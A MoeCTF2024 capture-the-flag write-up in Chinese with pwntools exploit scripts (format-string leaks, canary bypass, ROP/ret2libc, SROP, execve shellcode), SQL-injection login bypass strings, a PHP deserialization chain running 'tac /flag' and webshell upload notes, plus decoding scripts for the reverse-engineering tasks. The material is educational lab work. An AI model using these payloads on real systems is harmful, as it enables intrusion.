MoeCTF2024 个人WP


Pwn:

二进制漏洞审计入门指北:

nc直接有flag

flag_helper:

这里实际上考了mmap的参数

# flag_helper: the author's note above says the challenge is about mmap()'s
# arguments; the answers below are the values the author sent at each '>'
# prompt — their individual meaning is not shown on this page.
from pwn import*
context(log_level='debug')
p=remote('26.198.202.50',58549)

p.sendlineafter(b'>',b'4')          # presumably a menu choice
p.sendlineafter(b'>',b'./flag')     # a file path the service asks for
p.sendlineafter(b'>',b'0')
p.sendlineafter(b'>',b'7')
p.sendlineafter(b'>',b'34')
p.sendlineafter(b'>',b'5')
p.interactive()                     # hand the session over to the user

no_more_gets:

密码是随机生成的,但随机出的密码有可能以\x00开头;由于C字符串在\x00处截断,这种情况下密码实际上就只是\x00而已

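# no_more_gets: the password is random and may start with a NUL byte (see the
# note above); reconnect until a single b'\x00' is accepted. Every failed
# attempt closes its own connection so sockets do not pile up.
from pwn import*

while True:
    p=remote('26.198.202.50',54345)
    p.sendlineafter(b'get out.',b'\x00')
    p.recvline()
    key=p.recvline()            # the service's verdict line
    print(key)
    if b'Welcome back.' in key:
        p.interactive()
        break                   # the original looped and reconnected after the session ended
    p.close()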

leak_sth:

# leak_sth: connection setup.
# NOTE(review): the local process() started below is immediately shadowed by
# the remote() handle and never closed, leaving a stray ./leaksth child
# running; keep only one of the two lines active.
from pwn import*
context(log_level='debug')
p=process('./leaksth')
p=remote('26.198.202.50',9999)

def gdbs():
    """Attach gdb to the global connection ``p`` and pause the script until resumed."""
    target = p
    gdb.attach(target)
    pause()

# The name field is formatted by the service, so '%7$p' makes it print the
# value in its 7th format argument slot; that value is then sent back as the
# expected number.
payload=b'%7$p'
p.sendlineafter(b'your name?',payload)
p.recvline()
p.recvline()
# NOTE(review): recv(10) may return fewer than 10 bytes; recvn(10) would wait
# for exactly the "0x" + 8 hex digits this parse appears to expect — confirm.
num=int(p.recv(10),16)
print(hex(num))
payload=str(num)                  # answer in decimal
p.sendlineafter(b'Give me the number',payload)
p.interactive()

ez_shellcode:

感觉没啥可讲的

# ez_shellcode: connection setup (arch is set so asm()/shellcraft emit x86-64).
# NOTE(review): process('./ezshellcode') is shadowed by remote() and never
# closed; keep only one of the two lines active.
from pwn import*
context(arch='amd64')
p=process('./ezshellcode')
p=remote('26.198.202.50',53876)

def gdbs():
    """Debug helper: attach gdb to the global ``p`` and wait for the user. Not called here."""
    target = p
    gdb.attach(target)
    pause()

# The author answers the age prompt with -1; the service then prints a
# "gift" value that is parsed as "0x" + 12 hex digits.
p.sendlineafter(b'Tell me your age:',b'-1')
p.recvuntil(b'Here is a gift for you :\n')
gift=int(p.recv(14),16)
payload=asm(shellcraft.sh())
payload=payload.ljust(0x68,b'\x90')   # pad with NOPs to 0x68 bytes
payload+=p64(gift)                    # followed by the value the service printed
print(hex(gift))
p.sendlineafter(b'What do you want to say?',payload)
p.interactive()

LoginSystem:

依旧没啥讲的

# LoginSystem: the username is passed to a format function, so '%9$s' with an
# address appended prints the 8 bytes stored at that address; those bytes are
# replayed as the password.
# NOTE(review): process('./login') is shadowed by remote() and never closed.
from pwn import*
p=process('./login')
p=remote('26.198.202.50',55448)
password=0x404050                     # presumably where the stored password lives (author's value)

payload=b'aaaa%9$s'+p64(password)
p.sendlineafter(b'username:',payload)
p.recvuntil(b'aaaa')                  # skip to the echoed marker; the leaked bytes follow
password=u64(p.recv(8))               # name reused: now the leaked 8-byte value
p.sendlineafter(b'Please input your password:',p64(password))
p.interactive()
#8

Catch_the_canary!:

# Catch_the_canary!: first find the number the service expects by trying a
# fixed range (one connection per guess), then read the stack canary back
# out and return into the backdoor address the author located.
from pwn import*
context(log_level='debug')
backdoor=0x4012C9

for i in range(16768186,16768186+9029):
    p=remote('26.198.202.50',57055)
    p.sendline(str(i))
    p.recvline()
    p.recvline()
    key=p.recvline()
    print(key)
    if b'[Error] Wrong! Try again.' in key:
        p.close()
    else:
        break
# NOTE(review): if every guess fails, p is closed here and the sends below
# raise; a for/else that exits with a message would make that failure clear.

payload=b'a'*0x10+p64(0xbacd003)     # NOTE(review): dead assignment, overwritten below
p.sendlineafter(b'One shot.',b'+')
p.sendline(b'1')
p.sendline(str(0xbacd003))
p.sendafter(b'Stop it!',b'a'*0x19)   # 0x18 filler bytes plus one byte over the canary's low NUL
p.recvuntil(b'a'*0x19)
canary=u64(p.recv(8))                # 7 upper canary bytes followed by 1 byte of whatever is next
canary=(canary-0x100000000000000)<<8 # drop that trailing byte (assumed 0x01) and restore the low NUL
print(hex(canary))
payload=b'a'*0x18+p64(canary)+b'a'*8+p64(backdoor)   # filler, canary, 8 bytes (presumably saved rbp), return address
p.sendline(payload)
p.interactive()

System_not_found!:

感觉还行

# System_not_found!: two rounds through main. Round one overflows into a
# call to puts@plt and returns to main, which prints a libc pointer; round
# two uses that pointer to compute system() and "/bin/sh" in the author's
# libc copy. All offsets (0x62050, the pop rdi gadget) are specific to that libc.
# NOTE(review): process('./dialogue') is shadowed by remote() and never closed.
from pwn import*
context(log_level='debug')
p=process('./dialogue')
p=remote('26.198.202.50',53213)
puts_plt=0x401040
main=0x4011E1
ret=0x000000000040101a

payload=b'\xff'*0x11                  # 17 bytes of 0xff as the name; purpose not shown here
p.sendlineafter(b'your name?',payload)
payload=b'a'*(0x28+8)+p64(puts_plt)+p64(main)
p.sendlineafter(b'Where do you come from?',payload)
onelibc=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))   # 6-byte address, zero-extended
print("onelibc= "+hex(onelibc))
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
libcbase=onelibc-0x62050              # offset of the leaked pointer in the author's libc
system=libcbase+libc.sym['system']
binsh=libcbase+next(libc.search(b'/bin/sh'))
pop_rdi=libcbase+0x000000000002a3e5
payload=b'\xff'*0x11
p.sendlineafter(b'your name?',payload)
# The extra ret presumably keeps the stack 16-byte aligned before system() — confirm.
payload=b'a'*(0x28+8)+p64(ret)+p64(pop_rdi)+p64(binsh)+p64(system)
p.sendlineafter(b'Where do you come from?',payload)
p.interactive()

这是什么?shellcode!:

感觉pwntools写的shellcode也能用

# preshellcode, variant 1: send pwntools' stock /bin/sh shellcode as-is.
# NOTE(review): process('./preshellcode') is shadowed by remote() and never closed.
from pwn import*
context(arch='amd64')
p=process('./preshellcode')
p=remote('26.198.202.50',64169)

shellcode=asm(shellcraft.sh())
p.sendline(shellcode)
p.interactive()

也可以自己写

# preshellcode, variant 2: hand-written equivalent of shellcraft.sh().
# 0x0068732f6e69622f is "/bin/sh\0" in little-endian byte order; it is pushed
# so rsp points at the string, then execve(rsp, 0, 0) is made via syscall
# number 59 (execve on x86-64).
from pwn import*
context(arch='amd64')
p=process('./preshellcode')
#p=remote('26.198.202.50',64169)

shellcode=asm('''
mov rbx, 0x0068732f6e69622f
push rbx
mov rax,59
mov rdi,rsp
mov rsi,0
mov rdx,0
syscall
''')
p.sendline(shellcode)
p.interactive()

这是什么?libc!:

我用的是Ubuntu 22,所以可以直接用本机的libc

# prelibc: the service prints the address of puts itself, so libc's base is
# puts_addr minus puts's symbol offset in the author's local libc (the
# author notes it matches the challenge's Ubuntu 22 libc). Gadget offsets
# are likewise taken from that libc copy.
# NOTE(review): process('./prelibc') is shadowed by remote() and never closed.
from pwn import*
p=process('./prelibc')
p=remote('26.198.202.50',65444)

p.recvuntil(b'libc: ')
puts_addr=int(p.recv(14),16)          # "0x" + 12 hex digits
print(hex(puts_addr))
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
libcbase=puts_addr-libc.sym['puts']
system=libcbase+libc.sym['system']
binsh=libcbase+next(libc.search(b'/bin/sh'))
pop_rdi=libcbase+0x000000000002a3e5
ret=libcbase+0x0000000000029139
payload=b'a'*9+p64(ret)+p64(pop_rdi)+p64(binsh)+p64(system)
p.sendline(payload)
p.interactive()

这是什么?32-bit!:

# backdoor (32-bit): addresses below are from the author's binary.
# NOTE(review): process('./backdoor') is shadowed by remote() and never closed.
from pwn import*
p=process('./backdoor')
p=remote('26.198.202.50',63046)
execve=0x80490A0
binsh=0x804A011

def gdbs():
    """Debug helper: attach gdb to the global ``p`` and wait for the user (call is commented out below)."""
    target = p
    gdb.attach(target)
    pause()

# 32-bit cdecl layout after the filler: the function address, a dummy
# return address (0), then its arguments: binsh followed by two zeros.
payload=b'a'*(0x28+5)+p32(execve)+p32(0)+p32(binsh)+p32(0)*2
#gdbs()
p.sendline(payload)
p.interactive()

这是什么?GOT!:

# pregot: addresses below are from the author's binary.
# NOTE(review): process('./pregot') is shadowed by remote() and never closed;
# system_plt is defined but the payload uses the literal 0x401056 (= system_plt+6).
from pwn import*
context(log_level='debug')
p=process('./pregot')
p=remote('26.198.202.50',54772)
system_plt=0x401050
backdoor=0x40119A
callread=0x401280

def gdbs():
    """Debug helper: attach gdb to the global ``p`` and wait for the user (call is commented out below)."""
    target = p
    gdb.attach(target)
    pause()

# Eight qwords written over the data the service reads here; which GOT
# slots they land on is not shown on this page. 0x401056 is system_plt+6.
payload=p64(0)*2+p64(0x401056)+p64(0)*2+p64(backdoor)+p64(0)+p64(callread)
#gdbs()
p.sendafter(b'This is `puts`.',payload)
p.interactive()

这是什么?random!:

# prerandom: libc's random() is reproduced locally through ctypes so the
# "secret" values can be predicted from the seed the program uses.
# NOTE(review): process('./prerandom') is shadowed by remote() and never closed.
from pwn import*
from ctypes import*
import ctypes
context(log_level='debug')
p=process('./prerandom')
p=remote('26.198.202.50',52274)

def gdbs():
    """Debug helper: attach gdb to the global ``p`` and wait for the user. Not called here."""
    target = p
    gdb.attach(target)
    pause()

# Load the host's libc so time()/localtime()/srandom()/random() can be called directly.
dll=cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
class tm(ctypes.Structure):
    """Layout of the nine leading C ``int`` fields of ``struct tm``, used to read localtime()'s result."""
    _fields_ = [
        (field_name, ctypes.c_int)
        for field_name in (
            "tm_sec", "tm_min", "tm_hour", "tm_mday", "tm_mon",
            "tm_year", "tm_wday", "tm_yday", "tm_isdst",
        )
    ]
# Seed = day of the year of the current local time, then replay the ten
# random()%90000+10000 values the program will generate from that seed.
# NOTE(review): tm_pointer is assigned but never used. dll.time() returns a
# C int by default (restype not set), which truncates time_t but is fine
# for current dates.
timer=dll.time(None)
tm_pointer=tm()
dll.localtime.restype=ctypes.POINTER(tm)
localtime_pointer=dll.localtime(ctypes.byref(ctypes.c_long(timer)))   # localtime(const time_t*)
seed=localtime_pointer.contents
seed=seed.tm_yday
print(seed)
dll.srandom(seed)
for i in range(10):
    secret=dll.random()%90000+10000
    p.sendlineafter(b'>',str(secret))

p.sendlineafter(b'>',b'1')
p.sendlineafter(b'>',b'1')
p.interactive()

shellcode_revenge:

# shellcode_revenge: setup (arch is set so asm()/shellcraft emit x86-64).
from pwn import*
from ctypes import*
context(log_level='debug',arch='amd64')

def gdbs():
    """Debug helper: attach gdb to the global ``p`` and wait for the user (call is commented out below)."""
    target = p
    gdb.attach(target)
    pause()

# Only the local process is used here (the remote line is commented out).
# NOTE(review): addr is assigned but never used.
p=process('./shellcode')
#p=remote('26.198.202.50',65229)
addr=0x20240200

p.sendlineafter(b'>>>',b'1')
# The password is rand() seeded with the current second, reproduced via libc.
dll=cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
seed=dll.time(0)
dll.srand(seed)
pwd=dll.rand()
p.sendlineafter(b'password:',str(pwd))
p.sendlineafter(b'>>>',b'4')

# First stage: 4 bytes — a bare `syscall` plus the raw bytes EB 10 (a short
# jmp on x86); where it lands relative to the second stage is not shown here.
shellcode='''
syscall
'''
shellcode=asm(shellcode)+b'\xeb\x10'
print(len(shellcode))
#gdbs()
p.sendlineafter(b'Good luck.',shellcode)
# Second stage: open ./flag, read it into 0x20240000 and write it to stdout.
# NOTE(review): assumes the opened file gets fd 3 — holds only if no other fd is open.
shellcode=asm(shellcraft.open('./flag'))
shellcode+=asm(shellcraft.read(3,0x20240000,0x100))
shellcode+=asm(shellcraft.write(1,0x20240000,0x100))
payload=b'\x90'*0x10+shellcode       # 16-byte NOP sled in front
p.sendline(payload)
p.interactive()

return 15:

# return15: addresses below are from the author's binary; "what" presumably
# is the gadget that puts 15 (rt_sigreturn) in rax, per the challenge title.
# NOTE(review): process('./return15') is shadowed by remote() and never closed.
from pwn import*
context(arch='amd64')
p=process('./return15')
p=remote('26.198.202.50',52525)
what=0x401106
syscall=0x40111C
binsh=0x402008

def gdbs():
    """Debug helper: attach gdb to the global ``p`` and wait for the user (call is commented out below)."""
    target = p
    gdb.attach(target)
    pause()

# Fake signal frame: when sigreturn restores it, rip points at the syscall
# gadget with rax=59 (execve) and rdi=binsh, rsi=rdx=0.
sigreframe=SigreturnFrame()
sigreframe.rax=59
sigreframe.rip=syscall
sigreframe.rdi=binsh
sigreframe.rsi=0
sigreframe.rdx=0
payload=b'a'*0x28+p64(what)+p64(syscall)+bytes(sigreframe)   # filler, rax-setting gadget, syscall, frame
#gdbs()
p.sendline(payload)
p.interactive()

Read_once_twice!:

# Read_once_twice!: connection setup.
# NOTE(review): process('./twice') is shadowed by remote() and never closed.
from pwn import*
context(log_level='debug')
p=process('./twice')
p=remote('26.198.202.50',58165)

def gdbs():
    """Debug helper: attach gdb to the global ``p`` and wait for the user. Not called here."""
    target = p
    gdb.attach(target)
    pause()

# First read: 0x19 bytes overwrite the canary's low NUL byte so the echo
# prints its remaining 7 bytes; the NUL is put back in front.
p.sendafter(b'turned on?',b'a'*0x19)
p.recvuntil(b'a'*0x19)
canary=u64(b'\x00'+p.recv(7))
print(hex(canary))
# Second read: filler, canary, 8 bytes (presumably saved rbp), then only the
# low two bytes of the return address (sendafter, no newline, so exactly 2 bytes).
payload=b'a'*0x18+p64(canary)+b'a'*0x8+b'\xc6\x01'
p.sendafter(b'more chance...',payload)
p.interactive()

Web:

Web渗透测试与审计入门指北:

用phpstudy直接搭建一个本地网站就行

弗拉格之地的入口:

查看/robots.txt

查看/webtutorEntry.php得flag

ez_http:

这题满足各个条件即可得flag,没什么好说的,只是需要用bp才能看见flag

垫刀之路01: MoeCTF?启动!:

命令执行,tac /flag之后用env命令查看环境变量

ProveYourLove:

直接修改前端JS代码,去掉不允许连续提交的限制,然后点击300下

弗拉格之地的挑战:

这个战线太长了,改天弄个文章来讲

ImageCloud前置:

直接用file伪协议读取,file:///etc/passwd

垫刀之路02: 普通的文件上传:

传木马连接蚁剑,用蚁剑命令执行env,查看环境变量得flag

垫刀之路03: 这是一个图床:

把一句话木马后缀改为jpg,发出并抓包,然后把后缀名改回php就行。


垫刀之路04: 一个文件浏览器:

目录穿越,然后找flag

垫刀之路05: 登陆网站:

直接万能密码

username=admin123&password=1' or true--+
username=admin123&password=1' or true#
username=admin123&password=1' or true;%00

垫刀之路06: pop base mini moe:

<?php

class A {
    // Note how private properties are serialized: serialize() prefixes their
    // name with "\0A\0", which is why the result is urlencode()d below.
    private $evil='tac /flag';

    // How is the callable assigned? Here it is simply fixed in the class,
    // so the chain needs nothing else.
    private $a='system';
    // The sink: on destruction the string in $a is called as a function with
    // $evil as its argument — this is what makes unserialize() of untrusted
    // data dangerous.
    function __destruct() {
        $s = $this->a;
        $s($this->evil);
    }
}

class B {
    private $b;

    // __invoke gadget (calls $b with the given argument); not used by the
    // payload built below, which serializes only an A.
    function __invoke($c) {
        $s = $this->b;
        $s($c);
    }
}
// Build the payload: serialize an A (private properties included) and
// URL-encode it so the NUL bytes in the private-property names survive.
$p=new A();
echo urlencode(serialize($p));

?>

垫刀之路07: 泄漏的密码:

有了pin值,直接进入/console目录

在控制台中依次输入以下两条命令:先输入import os,再输入下一条

import os
# Run inside the debugger console reached with the PIN (note above): executes
# `cat flag` through a shell and returns the command's output as a string.
os.popen('cat flag').read()

Reverse:

逆向工程入门指北:

直接运行程序得flag

xor:

简单的异或

# xor: the obfuscated flag bytes, each XORed with the one-byte key 0x24.
result = [
    0x49, 0x4B, 0x41, 0x47, 0x50, 0x42, 0x5F, 0x41, 0x1C, 0x16,
    0x46, 0x10, 0x13, 0x1C, 0x40, 0x09, 0x42, 0x16, 0x46, 0x1C,
    0x09, 0x10, 0x10, 0x42, 0x1D, 0x09, 0x46, 0x15, 0x14, 0x14,
    0x09, 0x17, 0x16, 0x14, 0x41, 0x40, 0x40, 0x16, 0x14, 0x47,
    0x12, 0x40, 0x14, 0x59,
]

# XOR is its own inverse, so applying the same key recovers the flag text.
flag = ''.join(chr(byte ^ 0x24) for byte in result)

print(flag)

upx:

脱壳就有flag

dynamic:

简单的动态调试

upx-revenge:

upx手动脱壳,就出flag了。

d0tN3t:

# d0tN3t: each stored byte was mixed with the square of its index and the
# constant 114; the expression below undoes that per position.
result = [
    173, 146, 161, 174, 132, 179, 187, 234, 231, 244,
    177, 161, 65, 13, 18, 12, 166, 247, 229, 207,
    125, 109, 67, 180, 230, 156, 125, 127, 182, 236,
    105, 21, 215, 148, 92, 18, 199, 137, 124, 38,
    228, 55, 62, 164,
]

flag = ''.join(
    chr((((byte ^ (idx * idx)) ^ 114) - 114) % 256)
    for idx, byte in enumerate(result)
)

print(flag)

rc4:

直接找到关键数据,然后代入脚本

# Key and ciphertext taken from the binary (see the note above).
key = [*'RC4_1s_4w3s0m3']
content = [
    0xA7, 0x1A, 0x68, 0xEC, 0xD8, 0x27, 0x11, 0xCC, 0x8C, 0x9B, 0x16, 0x15,
    0x5C, 0xD2, 0x67, 0x3E, 0x82, 0xAD, 0xCE, 0x75, 0xD4, 0xBC, 0x57, 0x56,
    0xC2, 0x8A, 0x52, 0xB8, 0x6B, 0xD6, 0xCC, 0xF8, 0xA4, 0xBA, 0x72, 0x2F,
    0xE0, 0x57, 0x15, 0xB9, 0x24, 0x11,
]
rc4number = 0x100        # size of the RC4 state (256 entries)
s = [0] * rc4number      # state array, filled in by rc4_init()
flag = ''                # placeholder; the decoder prints its result instead
 
 
def rc4_init(s,key,rc4number):
    """Run the RC4 key schedule (KSA) in place on ``s``.

    ``s`` is first filled with 0..rc4number-1, then permuted by ``key``
    (a list of characters, cycled as needed). Returns None.
    """
    for idx in range(rc4number):
        s[idx] = idx
    key_len = len(key)
    j = 0
    for idx in range(rc4number):
        j = (j + s[idx] + ord(key[idx % key_len])) % rc4number
        s[idx], s[j] = s[j], s[idx]
 
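def rc4_endecode(s,content,rc4number):
    """Run the RC4 keystream generator (PRGA) over ``content`` and print the result.

    ``s`` must already be initialised by rc4_init(); it is permuted further in
    place. Each entry of ``content`` (an int byte) is replaced in place by the
    decoded character, as before; the joined string is printed and now also
    returned so callers can use it instead of scraping stdout.
    """
    i = j = 0
    for k, byte in enumerate(content):
        i = (i + 1) % rc4number
        j = (j + s[i]) % rc4number
        s[i], s[j] = s[j], s[i]
        t = (s[i] + s[j]) % rc4number
        content[k] = chr(byte ^ s[t])
    decoded = ''.join(content)
    print(decoded)
    return decoded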
 
 
# Run the key schedule with the recovered key, then decode and print the ciphertext.
rc4_init(s,key,rc4number)
rc4_endecode(s,content,rc4number)

xtea:

#include<stdint.h>
#include<stdio.h>
#include<string.h>
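/* Undo 32 rounds of the challenge's XTEA-shaped cipher in place on v[0..1].
 *
 * v:   two 32-bit words (ciphertext in, plaintext out).
 * key: four 32-bit words; each half-round picks key[(sum>>11)&3] or key[sum&3].
 *
 * The round function is XTEA's ((x<<4) ^ (x>>5)) + x (written 16*x here), but
 * delta is -0x33004445 (0xCCFFBBBB as uint32_t) instead of the standard
 * 0x9E3779B9, and sum starts at 32*delta for decryption.
 */
void decrypt(uint32_t v[2],uint32_t key[4])
{
    uint32_t v0=v[0],v1=v[1];
    uint32_t sum,delta=-0x33004445;   /* wraps to 0xCCFFBBBB; unsigned arithmetic below is intended */
    sum=delta*32;
    for(int i=0;i<32;i++)
    {
        v1-=(v0 + ((v0 >> 5) ^ (16 * v0)) ) ^ (key[ ((sum >> 11) & 3)]+ sum);
        sum-=delta;
        v0-=(key[ (sum & 3)]+ sum) ^ (v1 + ((v1 >> 5) ^ (16 * v1)));
    }
    v[0]=v0,v[1]=v1;
}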

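int main(void)
{
    /* The 12 ciphertext bytes A3 69 96 26 BD 78 0B 3D 9D A5 28 62 viewed as
     * three little-endian 32-bit words; the key is {2,0,2,4}. */
    uint32_t v[3]={0x269669a3,0x3d0b78bd,0x6228a59d};
    uint32_t key[4]={2,0,2,4};
    char text[sizeof v + 1];

    /* Overlapping blocks: words 1-2 are decrypted first, then words 0-1 —
     * presumably the reverse of an encryption that ran (0,1) then (1,2). */
    decrypt(&v[1],key);
    decrypt(&v[0],key);

    /* v carries no terminator, so the original printf("%s", v) read past the
     * array; copy into a NUL-terminated buffer before printing. */
    memcpy(text, v, sizeof v);
    text[sizeof v] = '\0';
    printf("moectf{%s}",text);
    return 0;
}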

还有题目没弄上来,我整理一下再发